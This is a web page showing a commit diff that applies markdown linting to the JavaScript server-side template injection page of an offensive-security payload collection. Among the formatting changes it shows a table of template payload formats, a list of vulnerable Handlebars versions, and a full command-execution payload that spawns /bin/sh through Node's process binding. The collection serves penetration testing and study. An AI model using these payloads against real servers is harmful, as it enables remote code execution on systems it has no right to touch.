gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-01-11 12:35:19 -08:00
Code Issues Packages Projects Releases Wiki Activity

Markdown Linting - SSI, SSRF, SSTI

Browse Source
This commit is contained in:
Swissky
2025-03-26 17:49:42 +01:00
parent 6963d1a21c
commit bad860d79d
13 changed files with 207 additions and 278 deletions
Download Patch File Download Diff File Expand all files Collapse all files

14
Server Side Template Injection/JavaScript.md
View File

@@ -2,19 +2,17 @@
> Server-Side Template Injection (SSTI) occurs when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In the context of JavaScript, SSTI vulnerabilities can arise when using server-side templating engines like Handlebars, EJS, or Pug, where user input is integrated into templates without adequate sanitization.
## Summary
- [Templating Libraries](#templating-libraries)
- [Handlebars](#handlebars)
- [Handlebars - Basic Injection](#handlebars---basic-injection)
- [Handlebars - Command Execution](#handlebars---command-execution)
- [Lodash](#Lodash)
- [Lodash](#lodash)
- [Lodash - Basic Injection](#lodash---basic-injection)
- [Lodash - Command Execution](#lodash---command-execution)
- [References](#references)
## Templating Libraries
| Template Name | Payload Format |
@@ -33,7 +31,6 @@
| VelocityJS | `#=set($X="")$X` |
| VueJS | `{{ }}` |
## Handlebars
[Official website](https://handlebarsjs.com/)
@@ -50,9 +47,9 @@
This payload only work in handlebars versions, fixed in [GHSA-q42p-pg8m-cqh6](https://github.com/advisories/GHSA-q42p-pg8m-cqh6):
* `>= 4.1.0`, `< 4.1.2`
* `>= 4.0.0`, `< 4.0.14`
* `< 3.0.7`
- `>= 4.1.0`, `< 4.1.2`
- `>= 4.0.0`, `< 4.0.14`
- `< 3.0.7`
```handlebars
{{#with "s" as |string|}}
@@ -123,8 +120,7 @@ ${= _.VERSION}
{{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","id;ls"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}}
```
## References
- [Exploiting Less.js to Achieve RCE - Jeremy Buis - July 1, 2021](https://web.archive.org/web/20210706135910/https://www.softwaresecured.com/exploiting-less-js/)
- [Handlebars template injection and RCE in a Shopify app - Mahmoud Gamal - April 4, 2019](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
- [Handlebars template injection and RCE in a Shopify app - Mahmoud Gamal - April 4, 2019](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)